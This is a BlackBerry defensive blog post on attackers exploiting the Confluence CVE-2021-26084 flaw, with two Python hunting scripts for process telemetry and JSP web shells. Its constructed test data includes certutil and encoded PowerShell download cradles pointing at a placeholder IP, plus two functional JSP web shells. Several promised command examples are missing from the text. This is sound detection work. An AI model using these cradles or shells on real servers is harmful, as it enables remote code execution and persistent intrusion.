Blue Team: A Defensive Perspective on the Confluence Vulnerability (CVE-2021-26084)
Over the past week and during the Labor Day holiday weekend, the BlackBerry Incident Response (IR) team has seen an increase in confirmed exploitation of the recently disclosed Confluence Server and Data Center vulnerability, assigned CVE-2021-26084. This continues a recent trend of critical vulnerabilities in external-facing systems.
The vulnerability, an OGNL injection in Confluence's Webwork layer, allows unauthenticated remote code execution (RCE): an attacker needs no Confluence account or other credentials, only network reachability to the web interface, to run arbitrary commands on the server as the account the Confluence service runs under. With multiple proof-of-concept (PoC) exploits circulating on the Internet, threat actors are scanning the web and dropping payloads as fast as they can, before network defenders have a chance to patch or mitigate.
This article highlights several attacker techniques we are seeing across multiple environments, such as the abuse of certutil and PowerShell to discover information about a compromised host and its network and to deploy additional persistence mechanisms.
Most Common Attacker Techniques
While this vulnerability also affects Linux® installations, every incident we have handled so far has involved Confluence running on Windows®. In those cases, BlackBerry observed the command prompt (cmd.exe) spawned as a child of the tomcat9.exe process, the bundled Tomcat service that Confluence runs under on Windows. A web server process has no legitimate reason to launch a shell, so hunting on this parent/child relationship surfaced many related events:
BlackBerry researchers initially found generic system discovery commands being used to enumerate information about the impacted host and its network:
Certutil (certutil.exe) is a legitimate command-line utility that ships with Windows for configuring and managing Certificate Services and certificates. It is also commonly abused by threat actors to perform a variety of malicious activities. Threat actors favor built-in Windows utilities because they are already present on a victim’s system, are signed by Microsoft, and are unlikely to be flagged as suspicious on their own; this attacker technique is called “living off the land” (LotL).
In these Confluence exploitation events, certutil was abused to download web shells and executable files, typically through its -urlcache -split -f options, which fetch a URL to a local path. Below is an example of how certutil was used to download a malicious binary file:
BlackBerry also observed PowerShell being used to download and execute code, scripts, and executable files, in some cases with the script hidden behind an encoded (base64) command line. Examples of these commands are included below.
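The hunting logic described above, as an added example that is not BlackBerry's own tooling or CAE rule set: it evaluates Windows process-creation events (modelled on Sysmon Event ID 1 fields: Image, ParentImage, CommandLine) for the four patterns discussed, namely cmd.exe/PowerShell/certutil spawned by tomcat9.exe, discovery commands under that parent, certutil download and decode options, and PowerShell download cradles, including one hidden behind -EncodedCommand. The sample events, the paths and the 198.51.100.7 address are constructed for the example; the child-process and indicator lists are my assumptions and should be tuned to your environment.

```python
"""Hunt process-creation telemetry for CVE-2021-26084 post-exploitation patterns.
Added example over constructed events; not BlackBerry's CAE rules."""
import base64
import re
from typing import Dict, List

CONFLUENCE_PARENT = "tomcat9.exe"  # Confluence's bundled Tomcat service on Windows
# Children a web server process should never spawn (assumed list; tune to environment).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe",
                       "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# certutil options that download, or decode/encode, files rather than manage certificates.
CERTUTIL_ABUSE = re.compile(r"-(urlcache|decode|encode|verifyctl)\b", re.I)
# Common PowerShell download cradles (also applied to the decoded -EncodedCommand body).
PS_DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                         r"Net\.WebClient|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)
# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob.
PS_ENCODED = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
DISCOVERY = re.compile(r"\b(whoami|net\s+(?:user|group|localgroup)|nltest|systeminfo|"
                       r"ipconfig|netstat)\b", re.I)


def image_name(path: str) -> str:
    """Lower-cased file name from a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """-EncodedCommand carries base64 of a UTF-16LE script; return it decoded,
    or "" when the command line has no (valid) encoded payload."""
    m = PS_ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def evaluate(event: Dict[str, str]) -> List[str]:
    """Names of the detections one event triggers; an empty list means no hit."""
    hits: List[str] = []
    child = image_name(event["Image"])
    parent = image_name(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    if parent == CONFLUENCE_PARENT and child in SUSPICIOUS_CHILDREN:
        hits.append("confluence_spawned_" + child.split(".")[0])
    if parent == CONFLUENCE_PARENT and DISCOVERY.search(cmd):
        hits.append("system_discovery")
    if child == "certutil.exe":
        m = CERTUTIL_ABUSE.search(cmd)
        if m:
            hits.append("certutil_" + m.group(1).lower())
    if child in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded:
            hits.append("powershell_encoded_command")
        if PS_DOWNLOAD.search(cmd) or PS_DOWNLOAD.search(decoded):
            hits.append("powershell_download")
    return hits


def hunt(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> detections, for flagged events only."""
    result: Dict[int, List[str]] = {}
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            result[i] = hits
    return result


# Constructed sample telemetry (not real incident data). The stager is base64 of
# UTF-16LE text, exactly as powershell.exe -EncodedCommand expects it.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
STAGER_ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Atlassian\Confluence\bin\tomcat9.exe",
     "CommandLine": 'cmd.exe /c "whoami /all & net user"'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -urlcache -split -f http://198.51.100.7/x.exe C:\Windows\Temp\x.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {STAGER_ENCODED}"},
    {"Image": r"C:\Windows\System32\certutil.exe",          # benign admin use: no hit
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"certutil -dump C:\certs\server.cer"},
    {"Image": r"C:\Program Files\Atlassian\Confluence\bin\tomcat9.exe",  # normal service start
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "tomcat9.exe //RS//Confluence"},
]

if __name__ == "__main__":
    for idx, hits in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"][:60], hits)
```

The parent/child rule is the highest-signal one: a Tomcat worker has no business launching cmd.exe regardless of what the command line says, which is why it is checked before the string indicators. Decoding the -EncodedCommand body before matching is what lets the download rule fire on the third event, whose visible command line contains no URL at all.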
Threat actors install backdoors on compromised hosts so that they do not have to re-exploit the vulnerability. A backdoor gives them continued access even after the original flaw is patched, which is why patching alone does not end an incident.
Because the Tomcat bundled with Confluence executes JavaServer Pages (JSP) as server-side code, a JSP file dropped into a web-accessible directory becomes a web shell that runs with the privileges of the Confluence service whenever it is requested. Threat actors are abusing this to gain persistent access to vulnerable Confluence servers. Examples of how certutil is abused to download web shell files include the following:
In some cases, the threat actor deployed Cobalt Strike stagers to the compromised systems to establish an in-memory command-and-control foothold and stage further lateral movement. A partial example of the Cobalt Strike deployment is included below.
Actions to Take
First, check this list to see if you have an on-premises, affected version of Confluence Server or Data Center (Confluence Cloud is not affected). If you are running an affected version, the next step is to upgrade to a fixed version. If you cannot upgrade immediately, apply the temporary workaround supplied by Atlassian until you can.
Finally, it is critical to check for signs of compromise on the Confluence host and the surrounding environment, since an attacker who got in before you patched still has whatever access they established. The attacker techniques listed above are what to look for. Check the entire file system, not only the Confluence install directory, for web shells. Note that web shells such as China Chopper can be very small, and attackers commonly timestomp a dropped shell so that its timestamps match the surrounding files, so hunt on file content rather than relying on modification dates.
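A content-based hunt for the JSP web shells described in the persistence section and in the step above, as an added example that is not BlackBerry's tooling: it walks a directory tree, scores every JSP by command-execution and class-loading primitives, and reports (but does not triage on) whether a flagged file's modification time matches its neighbours, so a timestomped shell is still caught. The indicator list and weights are my assumptions, and the sample tree, file names and contents are constructed for the example.

```python
"""Score JSP files for web-shell primitives under a Confluence/Tomcat tree.
Timestamps are reported only as context: a shell timestomped to blend in is
caught by content. Added example on a constructed tree; not a vendor signature set."""
import os
import re
import tempfile
import time
from typing import List, NamedTuple, Tuple

JSP_EXTENSIONS = (".jsp", ".jspx", ".jspf")

# (label, pattern, weight). Assumed weights: execution and class-loading primitives
# dominate; request.getParameter alone is ordinary JSP and must not fire by itself.
INDICATORS: List[Tuple[str, "re.Pattern[str]", int]] = [
    ("runtime_exec", re.compile(r"Runtime\.getRuntime\(\)\.exec"), 3),
    ("process_builder", re.compile(r"\bProcessBuilder\b"), 3),
    ("define_class", re.compile(r"\bdefineClass\b"), 3),  # in-memory class loader shells
    ("script_engine", re.compile(r"\bScriptEngineManager\b"), 2),
    ("cipher", re.compile(r"Cipher\.getInstance"), 2),   # encrypted-channel shells
    ("base64_decode", re.compile(r"Base64\.getDecoder|BASE64Decoder"), 1),
    ("request_param", re.compile(r"request\.getParameter\("), 1),
]
ALERT_THRESHOLD = 3
SIBLING_WINDOW_SECONDS = 120


class Finding(NamedTuple):
    path: str
    score: int
    indicators: List[str]
    mtime_matches_sibling: bool  # context only, never a reason to dismiss a hit


def score_text(text: str) -> Tuple[int, List[str]]:
    """Weighted indicator score for one JSP body, plus the labels that matched."""
    hits = [label for label, pattern, _ in INDICATORS if pattern.search(text)]
    score = sum(weight for label, _, weight in INDICATORS if label in hits)
    return score, hits


def scan_tree(root: str) -> List[Finding]:
    """Walk root, score every JSP, and return the files at or above threshold."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        mtimes = {f: os.stat(os.path.join(dirpath, f)).st_mtime for f in filenames}
        for name in filenames:
            if not name.lower().endswith(JSP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                score, hits = score_text(fh.read())
            if score < ALERT_THRESHOLD:
                continue
            blends = any(abs(mtimes[name] - t) < SIBLING_WINDOW_SECONDS
                         for other, t in mtimes.items() if other != name)
            findings.append(Finding(path, score, hits, blends))
    return sorted(findings, key=lambda f: f.path)


def build_sample_tree() -> str:
    """Constructed tree: two legitimate JSPs dated a year back, an exec shell
    timestomped to match them, a fresh class-loader shell, and a non-JSP decoy."""
    root = tempfile.mkdtemp(prefix="confluence-")
    pages = os.path.join(root, "confluence", "pages")
    os.makedirs(pages)
    files = {
        "viewpage.jsp": '<%@ page contentType="text/html" %><html><body><%= "Hello" %></body></html>',
        "search.jsp": '<% String q = request.getParameter("query"); out.println(q); %>',
        "error.jsp": ('<%@ page import="java.io.*" %><% Process p = Runtime.getRuntime()'
                      '.exec(request.getParameter("cmd")); BufferedReader r = new BufferedReader('
                      'new InputStreamReader(p.getInputStream())); String l; '
                      'while ((l = r.readLine()) != null) out.println(l); %>'),
        "help.jsp": ('<%@page import="javax.crypto.*"%><%!class U extends ClassLoader{U(ClassLoader c)'
                     '{super(c);}public Class g(byte[] b){return super.defineClass(b,0,b.length);}}%>'
                     '<% Cipher c = Cipher.getInstance("AES"); %>'),
        "README.txt": "Runtime.getRuntime().exec appears here only as prose; not scanned.",
    }
    for name, body in files.items():
        with open(os.path.join(pages, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    a_year_ago = time.time() - 365 * 86400
    for name in ("viewpage.jsp", "search.jsp", "error.jsp", "README.txt"):
        os.utime(os.path.join(pages, name), (a_year_ago, a_year_ago))  # error.jsp is timestomped
    return root


def hunt_sample() -> List[Finding]:
    """Build the constructed tree and scan it."""
    return scan_tree(build_sample_tree())


if __name__ == "__main__":
    for finding in hunt_sample():
        print(finding)
```

On a real host, point scan_tree at the Confluence install directory, Tomcat's work and temp directories, and any other web-served path; the mtime_matches_sibling flag is there to remind the analyst that the timestomped error.jsp looks older than the incident and would be missed by a "recently modified files" triage.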
BlackBerry Cyber Suite and BlackBerry Guard stop these attacks
If in doubt, call in the experts at BlackBerry to perform forensic analysis and conduct a compromise assessment. BlackBerry customers can feel confident that our AI-driven BlackBerry® Cyber Suite, as well as our Managed Detection & Response (MDR) solution BlackBerry® Guard, are well-equipped to mitigate the risks posed by these continued external-facing vulnerabilities. Core technology includes:
- BlackBerry® Protect provides automated malware prevention, application and script control, memory protection, and device policy enforcement.
- BlackBerry® Optics extends the threat prevention by using BlackBerry Optics Context Analysis Engine (CAE) rules to provide additional telemetry. The following rules were effective at identifying exploitation of the vulnerability:
- Certutil Abuse
- Powershell Download
- Powershell Encoded Command
- One-Liner ML Module
- Account Discovery
Victim of an Attack?
In the unfortunate event that it is too late for prevention and you believe you have already been the victim of an attack, please contact us, regardless of your existing BlackBerry relationship.
The BlackBerry Incident Response team is made up of world-class consultants dedicated to handling response and containment services for a wide range of incidents, including ransomware and Advanced Persistent Threat (APT) cases.
Read our latest blog on this vulnerability: Red Team: An Offensive Perspective on the Confluence Vulnerability (CVE-2021-26084)